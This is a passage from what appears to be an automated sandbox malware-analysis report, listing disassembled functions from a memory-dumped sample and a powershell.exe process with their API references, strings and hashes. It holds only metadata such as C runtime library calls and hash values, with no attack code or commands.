Instruction ID: a3613e61a9248d33db392f49d6c1021cd269d05c5a2a08d9804366fc63fd6e19
Opcode Fuzzy Hash: 82313b86be6aa325bcdbb2de17f5a91d720433a1203ac24aa7a233872a03c71d
Instruction Fuzzy Hash: 1221DEB47212049FC730DF25FD446087BB2BB08356BC0403AE90896A61DBB858A68F4E

Function 004221E5 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 57
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,00429458,0000000C,00422320,00000000,00000000,?,0042174F,00000003,?,?,?,?,?,?,004210F6), ref: 004221F7
__crt_waiting_on_module_handle.LIBCMT ref: 00422202

Part of subcall function 004213E1: Sleep.KERNEL32(000003E8,00000000,?,00422148,KERNEL32.DLL,?,00422194,?,0042174F,00000003), ref: 004213ED
Part of subcall function 004213E1: GetModuleHandleW.KERNEL32(?,?,00422148,KERNEL32.DLL,?,00422194,?,0042174F,00000003,?,?,?,?,?,?,004210F6), ref: 004213F6

GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 0042222B
GetProcAddress.KERNEL32(?,DecodePointer), ref: 0042223B
__lock.LIBCMT ref: 0042225D
InterlockedIncrement.KERNEL32(0042A4D8), ref: 0042226A
__lock.LIBCMT ref: 0042227E
___addlocaleref.LIBCMT ref: 0042229C

Strings

EncodePointer, xrefs: 0042221F
DecodePointer, xrefs: 00422233
KERNEL32.DLL, xrefs: 004221F1, 004221F6, 00422201

Memory Dump Source

Source File: 00000009.00000002.2825964972.0000000000421000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00420000, based on PE: true

Associated: 00000009.00000002.2825941774.0000000000420000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2825983477.0000000000428000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2826000589.000000000042A000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2826018247.000000000042C000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_420000_80c2T80R.jbxd

Similarity

API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
String ID: DecodePointer$EncodePointer$KERNEL32.DLL
API String ID: 1028249917-2843748187
Opcode ID: 2cd5f0e0738db079644ed5f91c474f858412cae544dd5a2a4f70a3b7f3d465ee
Instruction ID: 7f8f3bf0ef32f06d455c4298319688e326dd2b9c007999d90ac8fce100752340
Opcode Fuzzy Hash: 2cd5f0e0738db079644ed5f91c474f858412cae544dd5a2a4f70a3b7f3d465ee
Instruction Fuzzy Hash: B111A171B01720EED720AF66B945B4EBBE0AF54314FA0455FE499932A0CBB89941CB2C

Function 004240A0 Relevance: 7.5, APIs: 5, Instructions: 47
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__getptd.LIBCMT ref: 004240AC

Part of subcall function 00422345: __getptd_noexit.LIBCMT ref: 00422348
Part of subcall function 00422345: __amsg_exit.LIBCMT ref: 00422355

__amsg_exit.LIBCMT ref: 004240CC
__lock.LIBCMT ref: 004240DC
InterlockedDecrement.KERNEL32(?), ref: 004240F9
InterlockedIncrement.KERNEL32(013B2AF0), ref: 00424124

Memory Dump Source

Source File: 00000009.00000002.2825964972.0000000000421000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00420000, based on PE: true

Associated: 00000009.00000002.2825941774.0000000000420000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2825983477.0000000000428000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2826000589.000000000042A000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2826018247.000000000042C000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_420000_80c2T80R.jbxd

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
String ID:
API String ID: 4271482742-0
Opcode ID: e7757f68763a91235f94470b45b5688b45630235368591cfa95413418d173fe9
Instruction ID: 03d35b02b2387bae8246440d878bc5a08dcc025298c529e2e8b901eaf78b93d4
Opcode Fuzzy Hash: e7757f68763a91235f94470b45b5688b45630235368591cfa95413418d173fe9
Instruction Fuzzy Hash: 4501CE32B02631A7C621AF26B40A35E7260EF40710FC1401BE900A7691CB7C69E2CB9E

Function 004235EE Relevance: 7.5, APIs: 5, Instructions: 44
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__lock.LIBCMT ref: 0042360C

Part of subcall function 00422AA0: __mtinitlocknum.LIBCMT ref: 00422AB6
Part of subcall function 00422AA0: __amsg_exit.LIBCMT ref: 00422AC2
Part of subcall function 00422AA0: EnterCriticalSection.KERNEL32(?,?,?,00425600,00000004,00429628,0000000C,00423746,?,?,00000000,00000000,00000000,?,004222F7,00000001), ref: 00422ACA

___sbh_find_block.LIBCMT ref: 00423617
___sbh_free_block.LIBCMT ref: 00423626
HeapFree.KERNEL32(00000000,?,00429568,0000000C,00422A81,00000000,004294C8,0000000C,00422ABB,?,?,?,00425600,00000004,00429628,0000000C), ref: 00423656
GetLastError.KERNEL32(?,00425600,00000004,00429628,0000000C,00423746,?,?,00000000,00000000,00000000,?,004222F7,00000001,00000214), ref: 00423667

Memory Dump Source

Source File: 00000009.00000002.2825964972.0000000000421000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00420000, based on PE: true

Associated: 00000009.00000002.2825941774.0000000000420000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2825983477.0000000000428000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2826000589.000000000042A000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2826018247.000000000042C000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_420000_80c2T80R.jbxd

Similarity

API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
String ID:
API String ID: 2714421763-0
Opcode ID: b21ed6255d2030f384d1e4a0758fc9278e3caca8a5758d6dfc07b33b6d2e4654
Instruction ID: 995567d046506aaa326cb85bb5f04dad2946fbb210107a71e27f7ee07bbc82e4
Opcode Fuzzy Hash: b21ed6255d2030f384d1e4a0758fc9278e3caca8a5758d6dfc07b33b6d2e4654
Instruction Fuzzy Hash: 31017C32B05225BADB306F72BC06B4E3678EF01765FE0405FB100A6291CA7C8A41CA9D

Function 00423E04 Relevance: 6.0, APIs: 4, Instructions: 31
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__getptd.LIBCMT ref: 00423E10

Part of subcall function 00422345: __getptd_noexit.LIBCMT ref: 00422348
Part of subcall function 00422345: __amsg_exit.LIBCMT ref: 00422355

__getptd.LIBCMT ref: 00423E27
__amsg_exit.LIBCMT ref: 00423E35
__lock.LIBCMT ref: 00423E45

Memory Dump Source

Source File: 00000009.00000002.2825964972.0000000000421000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00420000, based on PE: true

Associated: 00000009.00000002.2825941774.0000000000420000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2825983477.0000000000428000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2826000589.000000000042A000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2826018247.000000000042C000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_420000_80c2T80R.jbxd

Similarity

API ID: __amsg_exit__getptd$__getptd_noexit__lock
String ID:
API String ID: 3521780317-0
Opcode ID: 58e574f7c768a4b1fd17c39ad826789deaff1fe6de188ea0aff046218dd165bb
Instruction ID: 90b35ff02ee32dbd8de5addf11b48a79887e37c726d05f6379c11ec7bf10405a
Opcode Fuzzy Hash: 58e574f7c768a4b1fd17c39ad826789deaff1fe6de188ea0aff046218dd165bb
Instruction Fuzzy Hash: AEF0CD32B00730ABD320FFB6B50674D72B0AF04B15FD1455FA841972A1CBBC9A42CA5E

Analysis Process: powershell.exePID: 3960, Parent PID: 6852COMMON

Executed Functions

Function 0279B570 Relevance: 2.8, Strings: 2, Instructions: 252COMMON

Download Yara Rule

Strings

X2p^, xrefs: 0279B6B3
+Y2p^, xrefs: 0279B5AC

Memory Dump Source

Source File: 0000000E.00000002.3215615794.0000000002790000.00000040.00000800.00020000.00000000.sdmp, Offset: 02790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2790000_powershell.jbxd

Similarity

API ID:
String ID: +Y2p^$X2p^
API String ID: 0-338256061
Opcode ID: 6ffd1def23d11bafb9b8c7aa18d0b6f79ab26b8cd05081e2c42bcd655deb6600
Instruction ID: 83281b941d12d94aae61b79e953d46b6db8a59a850a70152eef83b71e4b93a60
Opcode Fuzzy Hash: 6ffd1def23d11bafb9b8c7aa18d0b6f79ab26b8cd05081e2c42bcd655deb6600
Instruction Fuzzy Hash: 04914271F006145BDF2AEFB4D4146BFB7A2EF84604B01892DD54AAB344DF746E0A8BC6

Function 06F317B8 Relevance: 2.8, Strings: 2, Instructions: 341COMMON

Download Yara Rule

Strings

Tk, xrefs: 06F3192C
Tk, xrefs: 06F3193A

Memory Dump Source

Source File: 0000000E.00000002.3226818010.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6f30000_powershell.jbxd

Similarity

API ID:
String ID: Tk$Tk
API String ID: 0-2591943263
Opcode ID: d585a61c36ec7a2f413fcf156100506b31f153a88b326a04d5a5e0df83e83f38
Instruction ID: e10136f08fbae18567a49df00f887ca7618a5aac162859a9ee8f6ceccc6eec7a
Opcode Fuzzy Hash: d585a61c36ec7a2f413fcf156100506b31f153a88b326a04d5a5e0df83e83f38
Instruction Fuzzy Hash: 48B12432F042289FDB94DF69D8006AABBE6AFC5311F18C0BAD545CB391DB31D946C7A1

Function 0279E6F0 Relevance: 2.6, Strings: 2, Instructions: 100COMMON

Download Yara Rule

Strings

J_k, xrefs: 0279E7CA
pi&j, xrefs: 0279E747

Memory Dump Source

Source File: 0000000E.00000002.3215615794.0000000002790000.00000040.00000800.00020000.00000000.sdmp, Offset: 02790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2790000_powershell.jbxd

Similarity

API ID:
String ID: pi&j$J_k
API String ID: 0-867616760
Opcode ID: 832f1f3002006f83812ab34de5a3e8674e3fd82a98e0aa8d8621dcf22386865e
Instruction ID: b7c49ae24ef19af1fff787aec90633a018fe548418ab4878410c92ce316b45b1
Opcode Fuzzy Hash: 832f1f3002006f83812ab34de5a3e8674e3fd82a98e0aa8d8621dcf22386865e
Instruction Fuzzy Hash: 2131AE70E00205DFCB21DF69E958A9EBBF2FF48304F148569D80AAB391DB35AD45CB90

Function 0279E720 Relevance: 2.6, Strings: 2, Instructions: 83COMMON

Download Yara Rule

Strings

J_k, xrefs: 0279E7CA
pi&j, xrefs: 0279E747

Memory Dump Source

Source File: 0000000E.00000002.3215615794.0000000002790000.00000040.00000800.00020000.00000000.sdmp, Offset: 02790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2790000_powershell.jbxd

Similarity

API ID:
String ID: pi&j$J_k
API String ID: 0-867616760
Opcode ID: 6ccb6abdd625059a217d2000df5171e0c439062d79ecfbb254c20dd51c854761
Instruction ID: 7d7cca6054e1e4766d51d6f3e8768b54b8d129959d3b2a19468aa795aed807ad
Opcode Fuzzy Hash: 6ccb6abdd625059a217d2000df5171e0c439062d79ecfbb254c20dd51c854761
Instruction Fuzzy Hash: 15315A30A00209DFCB14DF69E594AAEBBF2FF48304F149569D80AA7394DB35AC85CB90

Function 027970A8 Relevance: 1.4, Strings: 1, Instructions: 114COMMON

Download Yara Rule

Strings

(bq, xrefs: 027971CD

Memory Dump Source

Source File: 0000000E.00000002.3215615794.0000000002790000.00000040.00000800.00020000.00000000.sdmp, Offset: 02790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2790000_powershell.jbxd

Similarity

API ID:
String ID: (bq
API String ID: 0-149360118
Opcode ID: e425d04499aa0ffc7f8b7692d7fe327174a169c5080b447b5a10e984872ac28a
Instruction ID: ae095c94823df4847e5a2334a1802b40bcf683418ffc36c3989d6b226c0a6e59
Opcode Fuzzy Hash: e425d04499aa0ffc7f8b7692d7fe327174a169c5080b447b5a10e984872ac28a
Instruction Fuzzy Hash: 55413A74B542448FDB18DB68D958AAEBBF2EF89310F194499E802AB395DB31DC41CF50

Function 0279B078 Relevance: 1.3, Strings: 1, Instructions: 82COMMON

Download Yara Rule

Strings

(&^q, xrefs: 0279B09A

Memory Dump Source

Source File: 0000000E.00000002.3215615794.0000000002790000.00000040.00000800.00020000.00000000.sdmp, Offset: 02790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2790000_powershell.jbxd

Similarity

API ID:
String ID: (&^q
API String ID: 0-2067289071
Opcode ID: c2f067a394f8f14c408e1e7b83ca55c87f037319a5e090238a9b819642f47fcd
Instruction ID: fca61ce23a59c97637839e0996e8637c820481c612876d78776ea37d3ce50692
Opcode Fuzzy Hash: c2f067a394f8f14c408e1e7b83ca55c87f037319a5e090238a9b819642f47fcd
Instruction Fuzzy Hash: AD21B076A003588FCB24DFAEE5047AEBFF5EB88324F14846AD418A7350CB749945CFA5

Function 0279AE08 Relevance: 1.3, Strings: 1, Instructions: 82COMMON

Download Yara Rule

Strings

[2p^, xrefs: 0279AF0F, 0279AF14

Memory Dump Source

Source File: 0000000E.00000002.3215615794.0000000002790000.00000040.00000800.00020000.00000000.sdmp, Offset: 02790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2790000_powershell.jbxd

Similarity

API ID:
String ID: [2p^
API String ID: 0-2439116051
Opcode ID: 6d6add4542f0a65f3add22eee5ff69ef8a9274a12707008fdcc10eb5158b14e8
Instruction ID: 6ddd505b773dcda5b761914df0e41ae6d326774c4df167e488cbf9c932eb0218
Opcode Fuzzy Hash: 6d6add4542f0a65f3add22eee5ff69ef8a9274a12707008fdcc10eb5158b14e8
Instruction Fuzzy Hash: 1A3173B4E002059FDB04EFA4D855BBEBBB3EF84300F1184B9D515AB394DA399D468F91

Function 0279AE18 Relevance: 1.3, Strings: 1, Instructions: 77COMMON

Download Yara Rule

Strings

[2p^, xrefs: 0279AF0F, 0279AF14

Memory Dump Source

Source File: 0000000E.00000002.3215615794.0000000002790000.00000040.00000800.00020000.00000000.sdmp, Offset: 02790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2790000_powershell.jbxd

Similarity

API ID:
String ID: [2p^
API String ID: 0-2439116051
Opcode ID: c8a0ed287eb0b47ce2237a08e17c8861375643119c3b1e5938b117b0a44c5c42
Instruction ID: 5c0e62f4701c18ba58e988bf98d296dbcf91d393060f1b66185688dddfcad81a
Opcode Fuzzy Hash: c8a0ed287eb0b47ce2237a08e17c8861375643119c3b1e5938b117b0a44c5c42
Instruction Fuzzy Hash: E5313EB4E002099FDB04EFA4D955BBEB7B3EF84300F1184A9D516AB394DA799D068F90

Function 0279DD68 Relevance: 1.3, Strings: 1, Instructions: 29COMMON

Download Yara Rule

Strings

K.2p^, xrefs: 0279DD9E

Memory Dump Source

Source File: 0000000E.00000002.3215615794.0000000002790000.00000040.00000800.00020000.00000000.sdmp, Offset: 02790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2790000_powershell.jbxd

Similarity

API ID:
String ID: K.2p^
API String ID: 0-2759217896
Opcode ID: 651be9631087c5c5f5edb7e56b11cb32764af2e65ac25b2f7d63a26d507aa9f4
Instruction ID: de42c1acbc294aed656e8e9240140cd927e5875be5683bae29da40a3921eaab1
Opcode Fuzzy Hash: 651be9631087c5c5f5edb7e56b11cb32764af2e65ac25b2f7d63a26d507aa9f4
Instruction Fuzzy Hash: 6BE0D13160561017C725622EB9119AF7BDEDFC52B1701446BE81587340DE65DC4587F6

Function 0279DD78 Relevance: 1.3, Strings: 1, Instructions: 23COMMON

Download Yara Rule

Strings

K.2p^, xrefs: 0279DD9E

Memory Dump Source

Source File: 0000000E.00000002.3215615794.0000000002790000.00000040.00000800.00020000.00000000.sdmp, Offset: 02790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2790000_powershell.jbxd

Similarity

API ID:
String ID: K.2p^
API String ID: 0-2759217896
Opcode ID: a09ca3ab9fba84e1ab4918969da0808b87fea9ef7cf3dd527a228b5624e515c1
Instruction ID: 38561a669f9eedd755d5999fb1b175b8c3d0ea550ff292172f886a5c28266b96
Opcode Fuzzy Hash: a09ca3ab9fba84e1ab4918969da0808b87fea9ef7cf3dd527a228b5624e515c1
Instruction Fuzzy Hash: D8E08C31740A241B8A21A62EA91086FB7DBDBC96A1301442AE02A87340DEA5DC0587A5

Function 027929F0 Relevance: .2, Instructions: 208COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3215615794.0000000002790000.00000040.00000800.00020000.00000000.sdmp, Offset: 02790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2790000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: baf8eb9a906dd1e81bfaace9519608a6078a626518d686042c5123f38832a1a4
Instruction ID: 25b92857ec98fce9330506ba77db9bcc4ae57f0e6f6add229680f4cc97b24487
Opcode Fuzzy Hash: baf8eb9a906dd1e81bfaace9519608a6078a626518d686042c5123f38832a1a4
Instruction Fuzzy Hash: 349179B0A002459FCB15DF59C894AAEFBB1FF88310B248699D815AB366C735FC51CFA4

Function 06F33CE8 Relevance: .2, Instructions: 183COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3226818010.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6f30000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 88a0f152f7e714a0396f583278b52f75afa98762a1cc0beaca88cee9a6949d12
Instruction ID: 854d491016834d03e572030c9ea2e7d92348b0fcc3ded07159bacdea5faa1bca
Opcode Fuzzy Hash: 88a0f152f7e714a0396f583278b52f75afa98762a1cc0beaca88cee9a6949d12
Instruction Fuzzy Hash: 5A510A32F043648FD755DB698810A6ABBA39F81210B1580AAD9018F352DF39DD4AC7F2

Function 06F3271F Relevance: .2, Instructions: 161COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3226818010.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6f30000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2918f47b3eeec4b1e8f44482bdfe07620ba0b96aa2e2ea3724fbefaa43f4c771
Instruction ID: a2eae850b966a9cc5e3fcbb50361bf7fe6d07e81e35d55601bded3642da54a7b
Opcode Fuzzy Hash: 2918f47b3eeec4b1e8f44482bdfe07620ba0b96aa2e2ea3724fbefaa43f4c771
Instruction Fuzzy Hash: EC517E32F44226DFDB549F68994069ABBE6FF85320F04807AD9018F392DB35CA46C7A1

Function 0279BBA0 Relevance: .2, Instructions: 155COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3215615794.0000000002790000.00000040.00000800.00020000.00000000.sdmp, Offset: 02790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2790000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ccf5df133a9983379a7230c7693a3f46626a27c545b4a13f44f0087d8a59168
Instruction ID: 804304111aeacba7daabd434868b1e443084f043e8e806c0b51878102c837f97
Opcode Fuzzy Hash: 0ccf5df133a9983379a7230c7693a3f46626a27c545b4a13f44f0087d8a59168
Instruction Fuzzy Hash: 8361F471E01248DFDB14CFA9E584A9DFBF2EF88318F14816AE809AB364DB749D45CB50

Function 0279BB90 Relevance: .1, Instructions: 149COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3215615794.0000000002790000.00000040.00000800.00020000.00000000.sdmp, Offset: 02790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2790000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2ce1700bd49d5081c1cc74dce63666291d02599ceda5341613b595894dedd70
Instruction ID: 50773eb47e1822146fc11dcb72df9aa5982b88c0086e5cf04893b3193d444d02
Opcode Fuzzy Hash: c2ce1700bd49d5081c1cc74dce63666291d02599ceda5341613b595894dedd70
Instruction Fuzzy Hash: 9F51F471E01248DFCB54CFA9E584A9DBBF1EF88318F188069E809AB364DB749945CB50

Function 0279E4F9 Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3215615794.0000000002790000.00000040.00000800.00020000.00000000.sdmp, Offset: 02790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2790000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c4693122e4742e08aed20dfcfa8b74f8941e49af4bb4775eef6d6143417f4ddf
Instruction ID: 07de70457435c4bfb2a51941a3fffeb15928d12f7928eb05f418309a45390d80
Opcode Fuzzy Hash: c4693122e4742e08aed20dfcfa8b74f8941e49af4bb4775eef6d6143417f4ddf
Instruction Fuzzy Hash: 334142747003058FDF24DF6CD99496ABBE6EF88310B1584A9E849CF365EB74EC018B91

Function 0279E508 Relevance: .1, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3215615794.0000000002790000.00000040.00000800.00020000.00000000.sdmp, Offset: 02790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2790000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e18474c03240b33d2b8060b2f4f381e37189165dce62dcfac30db7eb039690a
Instruction ID: 3f87d8901544032992f7f699e430452f691dba7eed5229b218702fff37c50a5d
Opcode Fuzzy Hash: 3e18474c03240b33d2b8060b2f4f381e37189165dce62dcfac30db7eb039690a
Instruction Fuzzy Hash: D0413F747003058FCF24DF6CDA9496ABBE6EF88310B1584A9E449DB369EB74ED018B91

Function 06F32907 Relevance: .1, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3226818010.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6f30000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ee88595d5973e1ceb5d680f7d91e3a5844cd8c5a118fcd4fe3e73ca54279349
Instruction ID: a2f7b1c7c08ebc17b5e2b0728a6ae856cdfec99dfb293b10f125c68724d7a31e
Opcode Fuzzy Hash: 8ee88595d5973e1ceb5d680f7d91e3a5844cd8c5a118fcd4fe3e73ca54279349
Instruction Fuzzy Hash: 06317D72F41225CFDB609F689980BAAFBD2AFC5210B1484BDD5418B256DF36CD46C3A1

Function 06F33CDF Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3226818010.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6f30000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c8d57b32a792c8931db211890d7aa3510a1a191c3181d6b59af1469e2f55f96d
Instruction ID: 10a0c60b86b6670683b3b7d8b45f764db63555437a3ed0d147de4fcc19779440
Opcode Fuzzy Hash: c8d57b32a792c8931db211890d7aa3510a1a191c3181d6b59af1469e2f55f96d
Instruction Fuzzy Hash: 2331F972E04365CFDBA5CF258910AAA7BA3AF80750F1540AAD9059F351CB39DC89C7F1

Function 0279C468 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3215615794.0000000002790000.00000040.00000800.00020000.00000000.sdmp, Offset: 02790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2790000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d2ad442d5f85c7e690820bfc2b6661c4325018fac8addca05db4bdb43d8af0c4
Instruction ID: 2a04e4ce5a685fad41d1fc39ca9b5661b3c9164f2d7588f37b47b50ddd218973
Opcode Fuzzy Hash: d2ad442d5f85c7e690820bfc2b6661c4325018fac8addca05db4bdb43d8af0c4
Instruction Fuzzy Hash: EB317C313006119FDB15DB78E854AAEB796EFC8314F00857AD90ACB3A4DFB4AD458B91

Function 02797098 Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3215615794.0000000002790000.00000040.00000800.00020000.00000000.sdmp, Offset: 02790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2790000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f9404d8c6ab451b69e3176fb4a9b23255008bb9f909558d9058e9f8557da323
Instruction ID: c83f6045fa9c47e34da33e0b315bf07d10f94cdc6fcfccbce8cfd68393dd62f6
Opcode Fuzzy Hash: 3f9404d8c6ab451b69e3176fb4a9b23255008bb9f909558d9058e9f8557da323
Instruction Fuzzy Hash: 91314D74B502058FDB08CB65D954AAEBBF2AB89214F185069E801AB355DB31EC41CF50

Function 02797808 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3215615794.0000000002790000.00000040.00000800.00020000.00000000.sdmp, Offset: 02790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2790000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bda03364f538982605ad626310f76d2630cc8946114cc840fddffb8def987d4f
Instruction ID: 4895a93c4e3818c55928be7e0fdf88f85bf80e4cac4c7e7ae1e25a14f186350f
Opcode Fuzzy Hash: bda03364f538982605ad626310f76d2630cc8946114cc840fddffb8def987d4f
Instruction Fuzzy Hash: 1031DFB07143419FDB199B28D855F3AB7E6BF89208F1684A9D409DB352EB35EC01CBA0

Function 0279AF40 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3215615794.0000000002790000.00000040.00000800.00020000.00000000.sdmp, Offset: 02790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2790000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b7c633ca8d1d28c1f87fa2b0cc3499aeea3a4df0668b6bfa6a5dcffa28f291e2
Instruction ID: fdfd3fd966436f427f88272ff402c3812e61f0946b13029822ceea129b89e6f6
Opcode Fuzzy Hash: b7c633ca8d1d28c1f87fa2b0cc3499aeea3a4df0668b6bfa6a5dcffa28f291e2
Instruction Fuzzy Hash: 75316770A002099BDF05DFADE598BAEBBF7AF89314F149069E805EB350EB748C418F50

Function 0279AF50 Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3215615794.0000000002790000.00000040.00000800.00020000.00000000.sdmp, Offset: 02790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2790000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 73add9bc80c2d8191a86e50e5835590f029db7488a63672efa5a36ed5209f221
Instruction ID: 21119ac11b6bb9812cf65960bfa467d3ef02a032ca966592f5414f9dcdf0463b
Opcode Fuzzy Hash: 73add9bc80c2d8191a86e50e5835590f029db7488a63672efa5a36ed5209f221
Instruction Fuzzy Hash: 04314970A012099FDF14DFADE594BAEBBF7AF89354F149069E805EB350EB748C418B50

Function 0279E0A0 Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3215615794.0000000002790000.00000040.00000800.00020000.00000000.sdmp, Offset: 02790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2790000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 55fc21b0f59c327c9001f99fcd5cb66e6a120bb7b62fdebd97571b500402bea4
Instruction ID: dc539653b21ab42dc5ba387865f2ce3c9ac1b5d02a736d2f688837f406e8bc9a
Opcode Fuzzy Hash: 55fc21b0f59c327c9001f99fcd5cb66e6a120bb7b62fdebd97571b500402bea4
Instruction Fuzzy Hash: 82311070A402148FCB14DF69E5986AEBBF2BF8C214F14856AD406EB390DF75AC85CF51

Function 0279E0B0 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3215615794.0000000002790000.00000040.00000800.00020000.00000000.sdmp, Offset: 02790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2790000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 20fec82db2c823e40664c15328951d015bb2e8a0246feb750d68e8ac58cc5e7d
Instruction ID: 22a3c6415494eb3f7f636e4c2aeb3f6c6ef847d0aec3638f38762f89f5983d20
